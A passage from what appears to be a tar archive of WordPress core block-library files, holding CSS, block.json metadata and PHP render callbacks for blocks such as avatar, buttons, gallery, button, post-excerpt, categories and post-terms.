}
.wp-block-avatar.aligncenter{
  text-align:center;
}avatar/editor.css000060400000000203151330427370010016 0ustar00.wp-block-avatar__image img{
  width:100%;
}

.wp-block-avatar.aligncenter .components-resizable-box__container{
  margin:0 auto;
}avatar/style-rtl.min.css000060400000000212151330427370011251 0ustar00.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}avatar/style.min.css000060400000000212151330427370010452 0ustar00.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}avatar/block.json000060400000002272151330427370010013 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/avatar",
	"title": "Avatar",
	"category": "theme",
	"description": "Add a user’s avatar.",
	"textdomain": "default",
	"attributes": {
		"userId": {
			"type": "number"
		},
		"size": {
			"type": "number",
			"default": 96
		},
		"isLink": {
			"type": "boolean",
			"default": false
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		}
	},
	"usesContext": [ "postType", "postId", "commentId" ],
	"supports": {
		"html": false,
		"align": true,
		"alignWide": false,
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"__experimentalBorder": {
			"__experimentalSkipSerialization": true,
			"radius": true,
			"width": true,
			"color": true,
			"style": true,
			"__experimentalDefaultControls": {
				"radius": true
			}
		},
		"color": {
			"text": false,
			"background": false,
			"__experimentalDuotone": "img"
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"selectors": {
		"border": ".wp-block-avatar img"
	},
	"editorStyle": "wp-block-avatar-editor",
	"style": "wp-block-avatar"
}
avatar/editor.min.css000060400000000167151330427370010611 0ustar00.wp-block-avatar__image img{width:100%}.wp-block-avatar.aligncenter .components-resizable-box__container{margin:0 auto}buttons/editor-rtl.min.css000060400000002125151330427370011624 0ustar00.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{margin:0}.wp-block-buttons>.block-list-appender{align-items:center;display:inline-flex}.wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{justify-content:flex-start}.wp-block-buttons>.wp-block-button:focus{box-shadow:none}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{margin-left:auto;margin-right:auto;margin-top:0;width:100%}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{margin-bottom:0}.editor-styles-wrapper .wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block[data-align=center]>.wp-block-buttons{align-items:center;justify-content:center}.wp-block[data-align=right]>.wp-block-buttons{justify-content:flex-end}buttons/style.css000060400000002572151330427370010123 0ustar00.wp-block-buttons.is-vertical{
  flex-direction:column;
}
.wp-block-buttons.is-vertical>.wp-block-button:last-child{
  margin-bottom:0;
}
.wp-block-buttons>.wp-block-button{
  display:inline-block;
  margin:0;
}
.wp-block-buttons.is-content-justification-left{
  justify-content:flex-start;
}
.wp-block-buttons.is-content-justification-left.is-vertical{
  align-items:flex-start;
}
.wp-block-buttons.is-content-justification-center{
  justify-content:center;
}
.wp-block-buttons.is-content-justification-center.is-vertical{
  align-items:center;
}
.wp-block-buttons.is-content-justification-right{
  justify-content:flex-end;
}
.wp-block-buttons.is-content-justification-right.is-vertical{
  align-items:flex-end;
}
.wp-block-buttons.is-content-justification-space-between{
  justify-content:space-between;
}
.wp-block-buttons.aligncenter{
  text-align:center;
}
.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{
  margin-left:auto;
  margin-right:auto;
  width:100%;
}
.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{
  text-decoration:inherit;
}
.wp-block-buttons.has-custom-font-size .wp-block-button__link{
  font-size:inherit;
}

.wp-block-button.aligncenter{
  text-align:center;
}buttons/style-rtl.css000060400000002572151330427370010722 0ustar00.wp-block-buttons.is-vertical{
  flex-direction:column;
}
.wp-block-buttons.is-vertical>.wp-block-button:last-child{
  margin-bottom:0;
}
.wp-block-buttons>.wp-block-button{
  display:inline-block;
  margin:0;
}
.wp-block-buttons.is-content-justification-left{
  justify-content:flex-start;
}
.wp-block-buttons.is-content-justification-left.is-vertical{
  align-items:flex-start;
}
.wp-block-buttons.is-content-justification-center{
  justify-content:center;
}
.wp-block-buttons.is-content-justification-center.is-vertical{
  align-items:center;
}
.wp-block-buttons.is-content-justification-right{
  justify-content:flex-end;
}
.wp-block-buttons.is-content-justification-right.is-vertical{
  align-items:flex-end;
}
.wp-block-buttons.is-content-justification-space-between{
  justify-content:space-between;
}
.wp-block-buttons.aligncenter{
  text-align:center;
}
.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{
  margin-left:auto;
  margin-right:auto;
  width:100%;
}
.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{
  text-decoration:inherit;
}
.wp-block-buttons.has-custom-font-size .wp-block-button__link{
  font-size:inherit;
}

.wp-block-button.aligncenter{
  text-align:center;
}buttons/editor.css000060400000002233151330427370010243 0ustar00.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{
  margin:0;
}
.wp-block-buttons>.block-list-appender{
  align-items:center;
  display:inline-flex;
}
.wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{
  justify-content:flex-start;
}
.wp-block-buttons>.wp-block-button:focus{
  box-shadow:none;
}
.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{
  margin-left:auto;
  margin-right:auto;
  margin-top:0;
  width:100%;
}
.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{
  margin-bottom:0;
}
.editor-styles-wrapper .wp-block-buttons.has-custom-font-size .wp-block-button__link{
  font-size:inherit;
}

.wp-block[data-align=center]>.wp-block-buttons{
  align-items:center;
  justify-content:center;
}

.wp-block[data-align=right]>.wp-block-buttons{
  justify-content:flex-end;
}buttons/editor.min.css000060400000002125151330427370011025 0ustar00.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{margin:0}.wp-block-buttons>.block-list-appender{align-items:center;display:inline-flex}.wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{justify-content:flex-start}.wp-block-buttons>.wp-block-button:focus{box-shadow:none}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{margin-left:auto;margin-right:auto;margin-top:0;width:100%}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{margin-bottom:0}.editor-styles-wrapper .wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block[data-align=center]>.wp-block-buttons{align-items:center;justify-content:center}.wp-block[data-align=right]>.wp-block-buttons{justify-content:flex-end}buttons/block.json000060400000002255151330427370010234 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/buttons",
	"title": "Buttons",
	"category": "design",
	"allowedBlocks": [ "core/button" ],
	"description": "Prompt visitors to take action with a group of button-style links.",
	"keywords": [ "link" ],
	"textdomain": "default",
	"supports": {
		"anchor": true,
		"align": [ "wide", "full" ],
		"html": false,
		"__experimentalExposeControlsToChildren": true,
		"spacing": {
			"blockGap": true,
			"margin": [ "top", "bottom" ],
			"__experimentalDefaultControls": {
				"blockGap": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"layout": {
			"allowSwitching": false,
			"allowInheriting": false,
			"default": {
				"type": "flex"
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-buttons-editor",
	"style": "wp-block-buttons"
}
buttons/editor-rtl.css000060400000002233151330427370011042 0ustar00.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{
  margin:0;
}
.wp-block-buttons>.block-list-appender{
  align-items:center;
  display:inline-flex;
}
.wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{
  justify-content:flex-start;
}
.wp-block-buttons>.wp-block-button:focus{
  box-shadow:none;
}
.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{
  margin-left:auto;
  margin-right:auto;
  margin-top:0;
  width:100%;
}
.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{
  margin-bottom:0;
}
.editor-styles-wrapper .wp-block-buttons.has-custom-font-size .wp-block-button__link{
  font-size:inherit;
}

.wp-block[data-align=center]>.wp-block-buttons{
  align-items:center;
  justify-content:center;
}

.wp-block[data-align=right]>.wp-block-buttons{
  justify-content:flex-end;
}buttons/style.min.css000060400000002427151330427370010704 0ustar00.wp-block-buttons.is-vertical{flex-direction:column}.wp-block-buttons.is-vertical>.wp-block-button:last-child{margin-bottom:0}.wp-block-buttons>.wp-block-button{display:inline-block;margin:0}.wp-block-buttons.is-content-justification-left{justify-content:flex-start}.wp-block-buttons.is-content-justification-left.is-vertical{align-items:flex-start}.wp-block-buttons.is-content-justification-center{justify-content:center}.wp-block-buttons.is-content-justification-center.is-vertical{align-items:center}.wp-block-buttons.is-content-justification-right{justify-content:flex-end}.wp-block-buttons.is-content-justification-right.is-vertical{align-items:flex-end}.wp-block-buttons.is-content-justification-space-between{justify-content:space-between}.wp-block-buttons.aligncenter{text-align:center}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;width:100%}.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-button.aligncenter{text-align:center}buttons/style-rtl.min.css000060400000002427151330427370011503 0ustar00.wp-block-buttons.is-vertical{flex-direction:column}.wp-block-buttons.is-vertical>.wp-block-button:last-child{margin-bottom:0}.wp-block-buttons>.wp-block-button{display:inline-block;margin:0}.wp-block-buttons.is-content-justification-left{justify-content:flex-start}.wp-block-buttons.is-content-justification-left.is-vertical{align-items:flex-start}.wp-block-buttons.is-content-justification-center{justify-content:center}.wp-block-buttons.is-content-justification-center.is-vertical{align-items:center}.wp-block-buttons.is-content-justification-right{justify-content:flex-end}.wp-block-buttons.is-content-justification-right.is-vertical{align-items:flex-end}.wp-block-buttons.is-content-justification-space-between{justify-content:space-between}.wp-block-buttons.aligncenter{text-align:center}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;width:100%}.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-button.aligncenter{text-align:center}gallery.php000060400000014446151330427370006726 0ustar00<?php
/**
 * Server-side rendering of the `core/gallery` block.
 *
 * @package WordPress
 */

/**
 * Handles backwards compatibility for Gallery Blocks,
 * whose images feature a `data-id` attribute.
 *
 * Now that the Gallery Block contains inner Image Blocks,
 * we add a custom `data-id` attribute before rendering the gallery
 * so that the Image Block can pick it up in its render_callback.
 *
 * @since 5.9.0
 *
 * @param array $parsed_block The block being rendered.
 * @return array The migrated block object.
 */
function block_core_gallery_data_id_backcompatibility( $parsed_block ) {
	if ( 'core/gallery' === $parsed_block['blockName'] ) {
		foreach ( $parsed_block['innerBlocks'] as $key => $inner_block ) {
			if ( 'core/image' === $inner_block['blockName'] ) {
				if ( ! isset( $parsed_block['innerBlocks'][ $key ]['attrs']['data-id'] ) && isset( $inner_block['attrs']['id'] ) ) {
					$parsed_block['innerBlocks'][ $key ]['attrs']['data-id'] = esc_attr( $inner_block['attrs']['id'] );
				}
			}
		}
	}

	return $parsed_block;
}

add_filter( 'render_block_data', 'block_core_gallery_data_id_backcompatibility' );

/**
 * Renders the `core/gallery` block on the server.
 *
 * @since 6.0.0
 *
 * @param array  $attributes Attributes of the block being rendered.
 * @param string $content Content of the block being rendered.
 * @return string The content of the block being rendered.
 */
function block_core_gallery_render( $attributes, $content ) {
	// Adds a style tag for the --wp--style--unstable-gallery-gap var.
	// The Gallery block needs to recalculate Image block width based on
	// the current gap setting in order to maintain the number of flex columns
	// so a css var is added to allow this.

	$gap = $attributes['style']['spacing']['blockGap'] ?? null;
	// Skip if gap value contains unsupported characters.
	// Regex for CSS value borrowed from `safecss_filter_attr`, and used here
	// because we only want to match against the value, not the CSS attribute.
	if ( is_array( $gap ) ) {
		foreach ( $gap as $key => $value ) {
			// Make sure $value is a string to avoid PHP 8.1 deprecation error in preg_match() when the value is null.
			$value = is_string( $value ) ? $value : '';
			$value = $value && preg_match( '%[\\\(&=}]|/\*%', $value ) ? null : $value;

			// Get spacing CSS variable from preset value if provided.
			if ( is_string( $value ) && str_contains( $value, 'var:preset|spacing|' ) ) {
				$index_to_splice = strrpos( $value, '|' ) + 1;
				$slug            = _wp_to_kebab_case( substr( $value, $index_to_splice ) );
				$value           = "var(--wp--preset--spacing--$slug)";
			}

			$gap[ $key ] = $value;
		}
	} else {
		// Make sure $gap is a string to avoid PHP 8.1 deprecation error in preg_match() when the value is null.
		$gap = is_string( $gap ) ? $gap : '';
		$gap = $gap && preg_match( '%[\\\(&=}]|/\*%', $gap ) ? null : $gap;

		// Get spacing CSS variable from preset value if provided.
		if ( is_string( $gap ) && str_contains( $gap, 'var:preset|spacing|' ) ) {
			$index_to_splice = strrpos( $gap, '|' ) + 1;
			$slug            = _wp_to_kebab_case( substr( $gap, $index_to_splice ) );
			$gap             = "var(--wp--preset--spacing--$slug)";
		}
	}

	$unique_gallery_classname = wp_unique_id( 'wp-block-gallery-' );
	$processed_content        = new WP_HTML_Tag_Processor( $content );
	$processed_content->next_tag();
	$processed_content->add_class( $unique_gallery_classname );

	// --gallery-block--gutter-size is deprecated. --wp--style--gallery-gap-default should be used by themes that want to set a default
	// gap on the gallery.
	$fallback_gap = 'var( --wp--style--gallery-gap-default, var( --gallery-block--gutter-size, var( --wp--style--block-gap, 0.5em ) ) )';
	$gap_value    = $gap ? $gap : $fallback_gap;
	$gap_column   = $gap_value;

	if ( is_array( $gap_value ) ) {
		$gap_row    = isset( $gap_value['top'] ) ? $gap_value['top'] : $fallback_gap;
		$gap_column = isset( $gap_value['left'] ) ? $gap_value['left'] : $fallback_gap;
		$gap_value  = $gap_row === $gap_column ? $gap_row : $gap_row . ' ' . $gap_column;
	}

	// The unstable gallery gap calculation requires a real value (such as `0px`) and not `0`.
	if ( '0' === $gap_column ) {
		$gap_column = '0px';
	}

	// Set the CSS variable to the column value, and the `gap` property to the combined gap value.
	$gallery_styles = array(
		array(
			'selector'     => ".wp-block-gallery.{$unique_gallery_classname}",
			'declarations' => array(
				'--wp--style--unstable-gallery-gap' => $gap_column,
				'gap'                               => $gap_value,
			),
		),
	);

	wp_style_engine_get_stylesheet_from_css_rules(
		$gallery_styles,
		array(
			'context' => 'block-supports',
		)
	);

	// The WP_HTML_Tag_Processor class calls get_updated_html() internally
	// when the instance is treated as a string, but here we explicitly
	// convert it to a string.
	$updated_content = $processed_content->get_updated_html();

	/*
	 * Randomize the order of image blocks. Ideally we should shuffle
	 * the `$parsed_block['innerBlocks']` via the `render_block_data` hook.
	 * However, this hook doesn't apply inner block updates when blocks are
	 * nested.
	 * @todo In the future, if this hook supports updating innerBlocks in
	 * nested blocks, it should be refactored.
	 *
	 * @see: https://github.com/WordPress/gutenberg/pull/58733
	 */
	if ( empty( $attributes['randomOrder'] ) ) {
		return $updated_content;
	}

	// This pattern matches figure elements with the `wp-block-image` class to
	// avoid the gallery's wrapping `figure` element and extract images only.
	$pattern = '/<figure[^>]*\bwp-block-image\b[^>]*>.*?<\/figure>/';

	// Find all Image blocks.
	preg_match_all( $pattern, $updated_content, $matches );
	if ( ! $matches ) {
		return $updated_content;
	}
	$image_blocks = $matches[0];

	// Randomize the order of Image blocks.
	shuffle( $image_blocks );
	$i       = 0;
	$content = preg_replace_callback(
		$pattern,
		static function () use ( $image_blocks, &$i ) {
			$new_image_block = $image_blocks[ $i ];
			++$i;
			return $new_image_block;
		},
		$updated_content
	);

	return $content;
}
/**
 * Registers the `core/gallery` block on server.
 *
 * @since 5.9.0
 */
function register_block_core_gallery() {
	register_block_type_from_metadata(
		__DIR__ . '/gallery',
		array(
			'render_callback' => 'block_core_gallery_render',
		)
	);
}

add_action( 'init', 'register_block_core_gallery' );
social-link/editor.min.css000060400000001203151330427370011530 0ustar00.wp-block-social-links .wp-social-link{line-height:0}.wp-block-social-link-anchor{align-items:center;background:none;border:0;box-sizing:border-box;color:currentColor;cursor:pointer;display:inline-flex;font-size:inherit;height:auto;opacity:1;padding:.25em}.wp-block-social-link-anchor:focus:not(:disabled){border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:3px solid #0000}:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link button){padding-left:.66667em;padding-right:.66667em}:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link button){padding:0}social-link/editor.css000060400000001312151330427370010747 0ustar00.wp-block-social-links .wp-social-link{
  line-height:0;
}

.wp-block-social-link-anchor{
  align-items:center;
  background:none;
  border:0;
  box-sizing:border-box;
  color:currentColor;
  cursor:pointer;
  display:inline-flex;
  font-size:inherit;
  height:auto;
  opacity:1;
  padding:.25em;
}
.wp-block-social-link-anchor:focus:not(:disabled){
  border-radius:2px;
  box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);
  outline:3px solid #0000;
}

:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link button){
  padding-left:.66667em;
  padding-right:.66667em;
}

:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link button){
  padding:0;
}social-link/block.json000060400000001370151330427370010740 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/social-link",
	"title": "Social Icon",
	"category": "widgets",
	"parent": [ "core/social-links" ],
	"description": "Display an icon linking to a social profile or site.",
	"textdomain": "default",
	"attributes": {
		"url": {
			"type": "string"
		},
		"service": {
			"type": "string"
		},
		"label": {
			"type": "string"
		},
		"rel": {
			"type": "string"
		}
	},
	"usesContext": [
		"openInNewTab",
		"showLabels",
		"iconColor",
		"iconColorValue",
		"iconBackgroundColor",
		"iconBackgroundColorValue"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-social-link-editor"
}
social-link/editor-rtl.min.css000060400000001203151330427370012327 0ustar00.wp-block-social-links .wp-social-link{line-height:0}.wp-block-social-link-anchor{align-items:center;background:none;border:0;box-sizing:border-box;color:currentColor;cursor:pointer;display:inline-flex;font-size:inherit;height:auto;opacity:1;padding:.25em}.wp-block-social-link-anchor:focus:not(:disabled){border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:3px solid #0000}:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link button){padding-left:.66667em;padding-right:.66667em}:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link button){padding:0}social-link/editor-rtl.css000060400000001312151330427370011546 0ustar00.wp-block-social-links .wp-social-link{
  line-height:0;
}

.wp-block-social-link-anchor{
  align-items:center;
  background:none;
  border:0;
  box-sizing:border-box;
  color:currentColor;
  cursor:pointer;
  display:inline-flex;
  font-size:inherit;
  height:auto;
  opacity:1;
  padding:.25em;
}
.wp-block-social-link-anchor:focus:not(:disabled){
  border-radius:2px;
  box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);
  outline:3px solid #0000;
}

:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link button){
  padding-left:.66667em;
  padding-right:.66667em;
}

:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link button){
  padding:0;
}pattern/block.json000060400000000633151330427370010211 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/pattern",
	"title": "Pattern placeholder",
	"category": "theme",
	"description": "Show a block pattern.",
	"supports": {
		"html": false,
		"inserter": false,
		"renaming": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"textdomain": "default",
	"attributes": {
		"slug": {
			"type": "string"
		}
	}
}
button.php000060400000003415151330427370006574 0ustar00<?php
/**
 * Server-side rendering of the `core/button` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/button` block on the server,
 *
 * @since 6.6.0
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The block content.
 * @param WP_Block $block      The block object.
 *
 * @return string The block content.
 */
function render_block_core_button( $attributes, $content ) {
	$p = new WP_HTML_Tag_Processor( $content );

	/*
	 * The button block can render an `<a>` or `<button>` and also has a
	 * `<div>` wrapper. Find the a or button tag.
	 */
	$tag = null;
	while ( $p->next_tag() ) {
		$tag = $p->get_tag();
		if ( 'A' === $tag || 'BUTTON' === $tag ) {
			break;
		}
	}

	/*
	 * If this happens, the likelihood is there's no block content,
	 * or the block has been modified by a plugin.
	 */
	if ( null === $tag ) {
		return $content;
	}

	// If the next token is the closing tag, the button is empty.
	$is_empty = true;
	while ( $p->next_token() && $tag !== $p->get_token_name() && $is_empty ) {
		if ( '#comment' !== $p->get_token_type() ) {
			/**
			 * Anything else implies this is not empty.
			 * This might include any text content (including a space),
			 * inline images or other HTML.
			 */
			$is_empty = false;
		}
	}

	/*
	 * When there's no text, render nothing for the block.
	 * See https://github.com/WordPress/gutenberg/issues/17221 for the
	 * reasoning behind this.
	 */
	if ( $is_empty ) {
		return '';
	}

	return $content;
}

/**
 * Registers the `core/button` block on server.
 *
 * @since 6.6.0
 */
function register_block_core_button() {
	register_block_type_from_metadata(
		__DIR__ . '/button',
		array(
			'render_callback' => 'render_block_core_button',
		)
	);
}
add_action( 'init', 'register_block_core_button' );
post-excerpt.php000060400000006567151330427370007731 0ustar00<?php
/**
 * Server-side rendering of the `core/post-excerpt` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-excerpt` block on the server.
 *
 * @since 5.8.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Returns the filtered post excerpt for the current post wrapped inside "p" tags.
 */
function render_block_core_post_excerpt( $attributes, $content, $block ) {
	if ( ! isset( $block->context['postId'] ) ) {
		return '';
	}

	/*
	* The purpose of the excerpt length setting is to limit the length of both
	* automatically generated and user-created excerpts.
	* Because the excerpt_length filter only applies to auto generated excerpts,
	* wp_trim_words is used instead.
	*/
	$excerpt_length = $attributes['excerptLength'];
	$excerpt        = get_the_excerpt( $block->context['postId'] );
	if ( isset( $excerpt_length ) ) {
		$excerpt = wp_trim_words( $excerpt, $excerpt_length );
	}

	$more_text           = ! empty( $attributes['moreText'] ) ? '<a class="wp-block-post-excerpt__more-link" href="' . esc_url( get_the_permalink( $block->context['postId'] ) ) . '">' . wp_kses_post( $attributes['moreText'] ) . '</a>' : '';
	$filter_excerpt_more = static function ( $more ) use ( $more_text ) {
		return empty( $more_text ) ? $more : '';
	};
	/**
	 * Some themes might use `excerpt_more` filter to handle the
	 * `more` link displayed after a trimmed excerpt. Since the
	 * block has a `more text` attribute we have to check and
	 * override if needed the return value from this filter.
	 * So if the block's attribute is not empty override the
	 * `excerpt_more` filter and return nothing. This will
	 * result in showing only one `read more` link at a time.
	 */
	add_filter( 'excerpt_more', $filter_excerpt_more );
	$classes = array();
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	$content               = '<p class="wp-block-post-excerpt__excerpt">' . $excerpt;
	$show_more_on_new_line = ! isset( $attributes['showMoreOnNewLine'] ) || $attributes['showMoreOnNewLine'];
	if ( $show_more_on_new_line && ! empty( $more_text ) ) {
		$content .= '</p><p class="wp-block-post-excerpt__more-text">' . $more_text . '</p>';
	} else {
		$content .= " $more_text</p>";
	}
	remove_filter( 'excerpt_more', $filter_excerpt_more );
	return sprintf( '<div %1$s>%2$s</div>', $wrapper_attributes, $content );
}

/**
 * Registers the `core/post-excerpt` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_post_excerpt() {
	register_block_type_from_metadata(
		__DIR__ . '/post-excerpt',
		array(
			'render_callback' => 'render_block_core_post_excerpt',
		)
	);
}
add_action( 'init', 'register_block_core_post_excerpt' );

/**
 * If themes or plugins filter the excerpt_length, we need to
 * override the filter in the editor, otherwise
 * the excerpt length block setting has no effect.
 * Returns 100 because 100 is the max length in the setting.
 */
if ( is_admin() ||
	defined( 'REST_REQUEST' ) && REST_REQUEST ) {
	add_filter(
		'excerpt_length',
		static function () {
			return 100;
		},
		PHP_INT_MAX
	);
}
categories.php000060400000005567151330427370007420 0ustar00<?php
/**
 * Server-side rendering of the `core/categories` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/categories` block on server.
 *
 * @since 5.0.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the categories list/dropdown markup.
 */
function render_block_core_categories( $attributes ) {
	static $block_id = 0;
	++$block_id;

	$args = array(
		'echo'         => false,
		'hierarchical' => ! empty( $attributes['showHierarchy'] ),
		'orderby'      => 'name',
		'show_count'   => ! empty( $attributes['showPostCounts'] ),
		'title_li'     => '',
		'hide_empty'   => empty( $attributes['showEmpty'] ),
	);
	if ( ! empty( $attributes['showOnlyTopLevel'] ) && $attributes['showOnlyTopLevel'] ) {
		$args['parent'] = 0;
	}

	if ( ! empty( $attributes['displayAsDropdown'] ) ) {
		$id                       = 'wp-block-categories-' . $block_id;
		$args['id']               = $id;
		$args['show_option_none'] = __( 'Select Category' );
		$wrapper_markup           = '<div %1$s><label class="screen-reader-text" for="' . esc_attr( $id ) . '">' . __( 'Categories' ) . '</label>%2$s</div>';
		$items_markup             = wp_dropdown_categories( $args );
		$type                     = 'dropdown';

		if ( ! is_admin() ) {
			// Inject the dropdown script immediately after the select dropdown.
			$items_markup = preg_replace(
				'#(?<=</select>)#',
				build_dropdown_script_block_core_categories( $id ),
				$items_markup,
				1
			);
		}
	} else {
		$wrapper_markup = '<ul %1$s>%2$s</ul>';
		$items_markup   = wp_list_categories( $args );
		$type           = 'list';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => "wp-block-categories-{$type}" ) );

	return sprintf(
		$wrapper_markup,
		$wrapper_attributes,
		$items_markup
	);
}

/**
 * Generates the inline script for a categories dropdown field.
 *
 * @since 5.0.0
 *
 * @param string $dropdown_id ID of the dropdown field.
 *
 * @return string Returns the dropdown onChange redirection script.
 */
function build_dropdown_script_block_core_categories( $dropdown_id ) {
	ob_start();
	?>
	<script>
	( function() {
		var dropdown = document.getElementById( '<?php echo esc_js( $dropdown_id ); ?>' );
		function onCatChange() {
			if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) {
				location.href = "<?php echo esc_url( home_url() ); ?>/?cat=" + dropdown.options[ dropdown.selectedIndex ].value;
			}
		}
		dropdown.onchange = onCatChange;
	})();
	</script>
	<?php
	return wp_get_inline_script_tag( str_replace( array( '<script>', '</script>' ), '', ob_get_clean() ) );
}

/**
 * Registers the `core/categories` block on server.
 *
 * @since 5.0.0
 */
function register_block_core_categories() {
	register_block_type_from_metadata(
		__DIR__ . '/categories',
		array(
			'render_callback' => 'render_block_core_categories',
		)
	);
}
add_action( 'init', 'register_block_core_categories' );
post-terms.php000060400000007153151330427370007401 0ustar00<?php
/**
 * Server-side rendering of the `core/post-terms` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-terms` block on the server.
 *
 * @since 5.8.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Returns the filtered post terms for the current post wrapped inside "a" tags.
 */
function render_block_core_post_terms( $attributes, $content, $block ) {
	if ( ! isset( $block->context['postId'] ) || ! isset( $attributes['term'] ) ) {
		return '';
	}

	if ( ! is_taxonomy_viewable( $attributes['term'] ) ) {
		return '';
	}

	$post_terms = get_the_terms( $block->context['postId'], $attributes['term'] );
	if ( is_wp_error( $post_terms ) || empty( $post_terms ) ) {
		return '';
	}

	$classes = array( 'taxonomy-' . $attributes['term'] );
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
